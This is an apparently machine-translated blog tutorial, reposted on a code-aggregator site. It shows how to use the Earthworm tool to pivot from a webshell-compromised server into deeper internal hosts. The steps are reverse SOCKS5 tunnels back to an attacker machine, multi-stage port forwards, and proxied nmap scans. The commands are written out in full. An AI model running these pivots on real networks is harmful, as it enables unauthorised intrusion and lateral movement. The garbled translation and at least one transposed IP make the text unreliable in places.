Ew completed using a multi-agency network penetration scene

Others 2020-03-17 16:10:41 views: null

Ew completed using a multi-agency network penetration scene

 2019-04-20 date  basis , the network penetration , agents penetrate , port forwarding  author amm907   0 comments 

 

0x01 demand

When infiltrations into the network, often require agents to flow into the network for further expansion, such as:

  • Port Scan
  • Port Forwarding
  • Access intranet web services
  • ……

0x02 Scene

The following simulate a usage scenario.

1, environment configuration, network topology

  • A1 - 120.xxx - Kali - public network server attack
  • V1 - 10.10.1.111 - Centos - server network, public network without opening the public network IP, for a web application port 80, open to the public network via a Nginx, have now been webshell, 10.10.1 route segments can be reached.
  • V2 - 10.10.2.111 - Centos - Intranet server, not open to the public network, routing section 10.10.3 and 10.10.1 can be reached.
  • V3 - 10.10.3.111 - Centos - network server, and do not open public network, there is a web application port 8080, paragraph 10.10.2 reachable 10.10.1 segment route is unreachable.

2019-08-09T07:37:44.png

2, the premise description

In a penetration, the operation of the web application on the A1 V1 to penetrate, get the webshell V1 and rebound shell onto the A1. Then intend to do within the network penetration, further resources found within the network.

0x03 operation

Tool to achieve penetration within the network, there are many, such as Earthworm, Termite, reGeorg, nps, the main use of simulated network ew operate here.

EW (Earthworm) is a portable network penetration tool with SOCKS v5 service and set up port forwarding two core functions, network penetration can be completed in a complex network environment.
Can "forward", "reverse", "multi-stage cascade" in order to get through a tunnel network, direct access to the depths of the network, breaking the network restrictions.
2019-07-06T07:41:12.png

There are 6 modes:

  • ssocksd - Forward Proxy
  • rcsocks - 1 reverse proxy, traffic forwarding
  • rssocks - 2 reverse proxy, socks5 rebound
  • lcx_listen - 1 reverse proxy, traffic forwarding
  • lcx_tran - port forwarding
  • lcx_slave - Port Binding

Scene One: the traffic agent to V1, carried out within the network information collection

After obtaining the shell V1, first download ew, ready to set up socks5, proxy local traffic.
Here you can choose between two ways: forward proxy and reverse proxy.

Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start socks5 service on the target machine V1 and listening port 1080:

./ew -s ssocksd -l 1080

Then flow to the proxy port 139.xxx of 1080, equivalent to proxy traffic to the target machine V1, and you can use the tools for further penetration.
A1 on proxychains proxy configuration:

vi /etc/proxychains.conf
[ProxyList]
socks5    139.x.x.x    1080

Reverse Proxy:
As the scene target V1 no public IP, but can access the public network. V1 because there is no specific address, can not use the forward connection, you can use a proxy connection rebound flow.
In the local start-up current attack aircraft A1 forwarding, external traffic from port 1080 forwarded to local port 8888 and waits for a rebound goal connection:

./ew -s rcsocks -l 1080 -e 8888

Start socks5 service on the target machine V1, and bounced back to the 8888 port of attack aircraft A1:

./ew -s rssocks -d 120.x.x.x -e 8888

Broker channel set up is completed, access to the A1 1080 8888 V1 equivalent access port, use proxychain on the attack machine A1 will flow to the local proxy port 1080, which is equivalent to the traffic agents on the target machine V1, and initiated the request on the A1 fairly to initiate a request on the V1, then you can use the tools for further penetration.
A1 on proxychains proxy configuration:

[ProxyList]
socks5    127.0.0.1    1080

Followed by further been found that the machine V1 segments within each network port on the nmap scanning A1:

proxychains nmap -p xxx

-sT -Pn -open 10.10.1.111/16
Note: Due to proxychains not proxy icmp packets to add ban ping parameters -Pn (does not detect whether the survival of the host, directly tcp port scan)

Scan results can only be found in section 10.2 of arrival machine within the network V2-10.10.2.111, opened 22 ports and other
attempts to infiltrate V2, found to have been set free in the dense login V2 V1, V1 before rebounding shell used ssh successfully logged on to V2.

Scene 2: The traffic agent to V2, for further information gathering

Now been shell V2 and V2 examination revealed unreasonable public network, public network traffic can not reverse proxy, the need for multi-level proxy by V1. Then the agent will flow onto V2 for further probing.
Here, too, there are two ways: forward proxy and reverse proxy.
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start socks5 proxy on the target machine V2 and listening port 9999:

./ew -s ssocksd -l 9999

Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Then flow to the proxy port 139.xxx of 1080, equivalent to the traffic agents on the target machine V2.
A1 on proxychains proxy configuration:

[ProxyList]
socks5    139.x.x.x    1080

Reverse Proxy:
forwards in the local startup flow attack aircraft A1, external traffic from forward port 1080 to the local port 8888 and waits for a rebound goal connection:

./ew -s lcx_listen -l 1080 -e 8888

Ew transfer to V2, and V2 start socks5 agent listening port 9999:

./ew -s ssocksd -l 9999

The last execution in V1, the 8888 port 9999 port binding with V2 of the A1, the establishment of socks5 channels:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

Broker channel set up is completed, the access A1 of 1080 is equivalent to 9999 V2 port access, the use of attack aircraft proxychain on A1 traffic agent to a local port 1080, which is equivalent to the traffic agents on the target machine V2, and initiated the request on the A1 fairly to initiate a request on V2.
A1 on proxychains proxy configuration:

[ProxyList]
socks5    127.0.0.1    1080

Then you can use the tools for further penetration here to use nmap port scan on the A1:

proxychains nmap -p xxx -sT -Pn -open 10.10.2.111/16

Scan results can be found to reach 10.3 segment of a machine within the network V3-10.10.3.111, open port 8080.
According to previous scan results on the V1, unable to reach 10.3 10.1 segment, but by V2 springboard, you can have access to the machine within the network and applications deeper.

For A1 browser proxy settings, the proxy to the local port 1080, that traffic agents to V2, so you can access the intranet web applications on V3.
Tries to access the browser http://10.10.3.111 : 8080, found an operation and maintenance management system, then they can penetrate further web, slightly.

Scene Three: Suppose shell V3 has been obtained, the agency will now flow into V3. (Three-stage cascade)

Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Start traffic forwarding on V2, the 8888 port binding 9999 port of V2 and V3, the establishment of socks5 channels:

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8888

Start socks5 proxy on the target machine V3 and listening on port 8888:

./ew -s ssocksd -l 8888

More than one way: by reverse proxy scenario in two ways, from the V1 → V3 erection can be achieved.
Then flow to the proxy port 139.xxx of 1080, equivalent to the traffic agents on the target machine V3.
A1 on proxychains proxy configuration:

[ProxyList]
socks5    139.x.x.x    1080

Reverse Proxy:
execution in attack aircraft A1, local start traffic forwarding, port forwarding from 8888 external traffic to the local port 1080 and waits for a rebound goal connection:

./ew -s rcsocks -l 1080 -e 8888

In V1 execution, the 9999 port binding with V2's 8888 port A1, the establishment of socks5 channels:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

In V2 execution, local start traffic forwarding, port forwarding from 7777 external traffic to the local port 9999 and wait for the target machine V3 rebound connection:

./ew -s lcx_listen -l 9999 -e 7777

Target V3 execution, start socks5 service, and bounced back to the 7777 port V2:

./ew -s rssocks -d 10.10.2.111 -e 7777

Broker channel set up is completed, access to the A1 port access V3 1080 is equivalent to 7777, the use of attack aircraft proxychain on A1 traffic agent to a local port 1080, which is equivalent to the traffic agents on the target machine V3, and initiated the request on the A1 fairly to initiate a request on V3.
A1 on proxychains proxy configuration:

[ProxyList]
socks5    127.0.0.1    1080

Port forwarding operations under the three-stage cascade: Four scenes

ew network also supports port forwarding, web application port agent on the target machine V3 now the network to the external network.
Forward Agent:
Assuming that the target machine V1 with a public IP (139.xxx), can be used the way forward proxy traffic.
Start traffic forwarding on the V1, the 9999 port binding 1080 port of V1 and V2, the establishment of socks5 channels:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Start traffic forwarding on V2, the 8080 port binding 9999 port of V2 and V3, the establishment of socks5 channels:

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080

Broker channel set up is complete, access the 1080 V1 V3 is equivalent to 8080 port access.
A1 access the browser http://139.xxx : 1080, namely to access the intranet web applications on V3.

Reverse Proxy:
execution in A1, start local traffic forwarding, port forwarding from 8888 external traffic to the local port 1080 and waits for a rebound goal connection:

./ew -s lcx_listen -l 1080 -e 8888

In V1 execution, the 9999 port binding with V2's 8888 port A1, the establishment of socks5 channels:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

In V2 execution, start traffic forwarding, port binding 8080 9999 Port of V2 and V3, the establishment of socks5 channels:

./ew -s lcx_tran -l 9999 -f 10.3.10.111 -g 8080

Broker channel set up is completed, the access A1 of 1080 is equivalent to 8080 V3 of port access.
A1 access the browser http://127.0.0.1 : 1080, namely to access the intranet web applications on V3.

0x04 summary

Diverse combat scenarios may be more complex and may be relatively simple, not elaborated on, try to cover common type of scenario chapter describes the basic use of four kinds of scenarios under ew.
The contents are based on the use of tools also without too much difficulty, the key is to figure out the actual target within the network data flow, to split large, complex scenes into several small scenes, make the problem easier.
Paper come Zhongjue know this practice is essential, I think more and more practical operation, can only continue to progress.

Guess you like

Origin www.cnblogs.com/bonelee/p/12511087.html
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com